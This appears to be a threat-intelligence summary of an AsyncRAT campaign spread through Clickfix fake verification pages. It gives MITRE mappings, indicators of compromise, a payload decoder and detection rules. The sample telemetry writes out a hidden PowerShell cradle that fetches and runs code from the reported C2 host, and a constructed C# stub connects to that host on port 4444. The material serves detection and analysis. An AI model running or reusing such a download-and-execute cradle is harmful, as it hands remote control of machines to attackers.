Fileless AsyncRAT Distributed Via Clickfix Technique Targeting German Speaking Users

A fileless AsyncRAT campaign delivers obfuscated PowerShell commands through a Clickfix-style fake verification page aimed at German-speaking users. The loader establishes persistence via HKCU registry keys and keeps a TCP connection to a remote C2 server open on port 4444, giving the operator full remote control without writing the payload to disk. #AsyncRAT #Clickfix #PowerShell #namoetde

Keypoints

  • The malware is delivered through a Clickfix-style phishing page that shows German-speaking users a fake verification prompt in German and walks them into running an attacker-supplied command; Clickfix is the lure technique, not an impersonated brand.
  • The attack launches the obfuscated PowerShell command through conhost.exe in headless mode so no console window is shown; the command downloads and runs a second-stage payload entirely in memory.
  • AsyncRAT establishes persistence by writing launcher commands to HKCU registry run keys (RunOnce and the Windows NT\CurrentVersion\Windows key) so the loader executes again at user logon.
  • The core payload consists of reversed and base64-encoded C# code compiled in memory using PowerShell’s Add-Type cmdlet.
  • It creates a persistent TCP client connection to namoet[.]de on port 4444 for command and control.
  • The malware enables full remote control capabilities, including command execution, credential theft, data exfiltration, and process management.
  • Mitigation efforts focus on blocking suspicious PowerShell execution, monitoring registry changes, scanning memory with YARA rules, and restricting LOLBin abuses.

MITRE Techniques

  • [T1059.001] Command and Scripting Interpreter: PowerShell – Executes the obfuscated PowerShell payload via conhost.exe --headless with hidden-window and no-profile flags to avoid drawing attention. (“Executes PowerShell payload using --headless, -w hidden, -nop, -c flags”)
  • [T1105] Ingress Tool Transfer – Downloads second-stage payload from http://namoet[.]de/x using Invoke-WebRequest. (“Downloads second stage (http://namoet[.]de/x) using Invoke-WebRequest”)
  • [T1027] Obfuscated Files or Information – Uses reversed and fragmented base64-encoded strings to obfuscate the payload. (“Payload obfuscation and decoding with reversed, base64-encoded C# payload embedded in a PowerShell string”)
  • [T1127.001] Compile After Delivery – Compiles and executes embedded C# code at runtime using Add-Type in PowerShell. (“Uses Add-Type to compile and run embedded .NET code at runtime”)
  • [T1095, T1571] Non-Application Layer Protocol, Non-Standard Port – Maintains a persistent raw TCP connection to the C2 server on port 4444; no HTTP framing of the C2 channel is described. (“Maintains persistent C2 connection to attacker over TCP (port 4444)”)
  • [T1059] Command and Scripting Interpreter – Redirects the standard input and output streams of the spawned interpreter over the C2 connection so the operator can run commands interactively and pull back results, i.e. a reverse shell. (“Redirects standard input/output for command execution and interprocess communication”)
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Establishes persistence by writing launcher commands to HKCU RunOnce and Windows NT\CurrentVersion\Windows keys so the loader re-executes at the user’s next logon. (“Sets HKCU:…RunOnce and HKCU:…Windows keys with launcher commands”)
  • [T1055] Process Injection – The loader contains an optional code path that converts byte arrays into shellcode or a DLL for in-memory injection; it is not the primary execution path described. (“Converts byte arrays to shellcode or DLL for injection”)
  • [T1140, T1620] Deobfuscate/Decode Files or Information, Reflective Code Loading – Reverses strings and decodes them at runtime, then loads the resulting .NET code reflectively without touching disk. (“Reverse-order strings, dynamic decoding, reflective loading used to evade detection”)
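The obfuscation chain above (C# source, base64-encoded, the encoded string reversed and split into quoted fragments inside a PowerShell command, then compiled with Add-Type) is mechanical to undo once recognised. The following is an added example for analysts, not CloudSEK’s code and not the campaign’s real payload: it generates a one-liner of the reported shape from a constructed C# stub and then recovers the cleartext from it. The `TcpClient("namoet.de", 4444)` call in the stub mirrors the reported C2 endpoint but is a constructed stand-in, and the PowerShell wrapper produced by `obfuscate()` is an assumed reconstruction, not text quoted from the report.

```python
"""Analyst-side decoder for reversed, fragmented base64 inside a PowerShell one-liner.
Added example with constructed input; not CloudSEK's code, not the real sample."""
import base64
import re

# Constructed stand-in for the embedded C# payload (NOT the real sample).
# The TcpClient call mirrors the reported C2 endpoint, namoet.de:4444.
SAMPLE_CSHARP = (
    'using System.Net.Sockets; public class P { public static void Run() { '
    'var c = new TcpClient("namoet.de", 4444); } }'
)

FRAGMENT_RE = re.compile(r"'([A-Za-z0-9+/=]+)'")          # single-quoted base64 pieces
B64_SHAPE_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")       # well-formed base64 only
TCP_ENDPOINT_RE = re.compile(r'new\s+TcpClient\(\s*"([^"]+)"\s*,\s*(\d+)\s*\)')


def obfuscate(payload: str, chunk: int = 12) -> str:
    """Generate a one-liner of the reported shape so the decoder has realistic
    input: base64 -> reverse the string -> split into 'quoted' fragments joined
    with '+'. The surrounding PowerShell (reversal via a negative range, then
    Add-Type) is an assumed reconstruction, not text quoted from the report."""
    rev = base64.b64encode(payload.encode()).decode()[::-1]
    frags = "+".join(f"'{rev[i:i + chunk]}'" for i in range(0, len(rev), chunk))
    return (
        f"$s=({frags});"
        "$d=-join $s[-1..-($s.Length)];"
        "Add-Type -TypeDefinition ([Text.Encoding]::UTF8.GetString("
        "[Convert]::FromBase64String($d)))"
    )


def decode_reversed_b64(one_liner: str) -> str:
    """Pull the quoted fragments in order and concatenate them, then try the
    reversed and the as-is concatenation: only a candidate that is well-formed
    base64 and decodes to printable UTF-8 text is accepted."""
    frags = FRAGMENT_RE.findall(one_liner)
    if not frags:
        raise ValueError("no base64-looking fragments found")
    joined = "".join(frags)
    for candidate in (joined[::-1], joined):
        if not B64_SHAPE_RE.match(candidate) or len(candidate) % 4:
            continue
        try:
            text = base64.b64decode(candidate, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            return text
    raise ValueError("fragments did not decode to text in either orientation")


def extract_tcp_endpoint(csharp: str):
    """Lift the C2 host and port out of a decoded TcpClient constructor call.
    Returns (host, port) or None when no such call is present."""
    m = TCP_ENDPOINT_RE.search(csharp)
    return (m.group(1), int(m.group(2))) if m else None


if __name__ == "__main__":
    sample = obfuscate(SAMPLE_CSHARP)
    recovered = decode_reversed_b64(sample)
    print(recovered)
    print(extract_tcp_endpoint(recovered))
```

Trying both orientations matters in practice: operators vary whether the reversal is applied to the base64 text or to the decoded bytes, and a fragment list that was never reversed should still decode. Accepting only candidates that decode to printable text is the cheap sanity check that filters the wrong orientation.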

Indicators of Compromise

  • [IP] Clickfix delivery infrastructure – 109.250.111[.]155, 109.250.109[.]80, and multiple other IPs used for delivery
  • [FQDN] Command and Control server – namoet[.]de used for hosting the PowerShell payload and TCP C2 communication
  • [Port] TCP reverse shell listener port – 4444 used by AsyncRAT for persistent C2 communication
  • [URL] PowerShell payload location – hxxp[:]//namoet[.]de:80/x delivering the obfuscated payload
  • [Registry] Persistence keys – HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\windows and HKCU:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\win used to maintain startup execution
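The mitigation items in the Keypoints (blocking suspicious PowerShell execution, monitoring registry changes, restricting LOLBin abuse) and the indicators listed in this section can be expressed as host-telemetry rules. The following is an added example, not CloudSEK’s detection content: it evaluates constructed Sysmon-style events (process creation, network connection, registry value set) against the behaviours this report describes. Paths, SIDs, hostnames and command lines in the sample events are constructed; the `| iex` in the sample download cradle and the inclusion of the `Run` key alongside `RunOnce` are assumptions that generalise slightly beyond the report.

```python
"""Detection logic for the Clickfix -> conhost --headless -> hidden PowerShell ->
in-memory AsyncRAT chain. Added example over constructed Sysmon-style events;
not CloudSEK's detection content."""
import re
from dataclasses import dataclass


@dataclass
class Event:
    event_id: int             # Sysmon: 1 = process create, 3 = network connect, 13 = registry value set
    image: str = ""
    parent_image: str = ""
    command_line: str = ""
    target_object: str = ""   # registry path for event 13
    dest_host: str = ""
    dest_port: int = 0


HIDDEN_WINDOW = re.compile(r"(?i)(?:^|\s)-(?:w|win|windowstyle)\s+hidden\b")
NO_PROFILE = re.compile(r"(?i)(?:^|\s)-(?:nop|noprofile)\b")
DOWNLOAD_CRADLE = re.compile(r"(?i)\b(?:iwr|Invoke-WebRequest|irm|Invoke-RestMethod)\b.*https?://")
COMPILE_AFTER_DELIVERY = re.compile(r"(?i)\bAdd-Type\b")
# RunOnce/Run per the report; the Windows NT\CurrentVersion\Windows key is matched
# as a whole because anything written there by a script is suspicious.
AUTORUN_KEYS = re.compile(r"(?i)\\CurrentVersion\\(?:RunOnce|Run)\\|\\Windows NT\\CurrentVersion\\Windows\\")
C2_HOSTS = {"namoet.de"}   # reported C2 domain
C2_PORTS = {4444}          # reported C2 port
POWERSHELL = ("powershell.exe", "pwsh.exe")


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def evaluate(ev: Event) -> list[str]:
    """Return the names of every rule a single event trips (empty list if none)."""
    hits: list[str] = []
    if ev.event_id == 1:
        img, parent, cl = _basename(ev.image), _basename(ev.parent_image), ev.command_line
        if img == "conhost.exe" and "--headless" in cl.lower():
            hits.append("conhost_headless_launcher")
        if img in POWERSHELL:
            if parent == "conhost.exe":
                hits.append("powershell_spawned_by_conhost")
            if HIDDEN_WINDOW.search(cl) and NO_PROFILE.search(cl):
                hits.append("powershell_hidden_noprofile")
            if DOWNLOAD_CRADLE.search(cl):
                hits.append("powershell_download_cradle")
            if COMPILE_AFTER_DELIVERY.search(cl):
                hits.append("powershell_add_type")
    elif ev.event_id == 13 and AUTORUN_KEYS.search(ev.target_object):
        hits.append("hkcu_autorun_registry_write")
    elif ev.event_id == 3 and _basename(ev.image) in POWERSHELL:
        if ev.dest_port in C2_PORTS or ev.dest_host.lower() in C2_HOSTS:
            hits.append("powershell_c2_connection")
    return hits


def scan(events: list[Event]) -> list[tuple[int, str]]:
    """Evaluate a batch of events; returns (event index, rule name) pairs."""
    return [(i, hit) for i, ev in enumerate(events) for hit in evaluate(ev)]


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SID = r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"

# Constructed sample telemetry: the chain from the report followed by two benign events.
SAMPLE_EVENTS = [
    Event(1, image=r"C:\Windows\System32\conhost.exe", parent_image=r"C:\Windows\explorer.exe",
          command_line='conhost.exe --headless powershell -w hidden -nop -c "iwr http://namoet.de/x | iex"'),
    Event(1, image=PS_IMAGE, parent_image=r"C:\Windows\System32\conhost.exe",
          command_line='powershell -w hidden -nop -c "iwr http://namoet.de/x | iex"'),
    Event(13, image=PS_IMAGE,
          target_object=SID + r"\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\windows"),
    Event(13, image=PS_IMAGE,
          target_object=SID + r"\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\win"),
    Event(3, image=PS_IMAGE, dest_host="namoet.de", dest_port=4444),
    Event(1, image=PS_IMAGE, parent_image=r"C:\Windows\explorer.exe",
          command_line=r"powershell -NoProfile -File C:\Scripts\backup.ps1"),
    Event(13, image=r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
          target_object=SID + r"\Software\Microsoft\Office\16.0\Word\Options\x"),
]


if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event[{idx}] -> {rule}")
```

The host and port rules are the least durable: delivery and C2 infrastructure rotate, and 4444 is trivial to change. The behavioural rules (conhost.exe in headless mode as the PowerShell parent, a hidden no-profile PowerShell carrying a download cradle, and PowerShell writing under HKCU autorun keys) survive a change of infrastructure and should be the ones that page an analyst.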


Read more: https://www.cloudsek.com/blog/fileless-asyncrat-distributed-via-clickfix-technique-targeting-german-speaking-users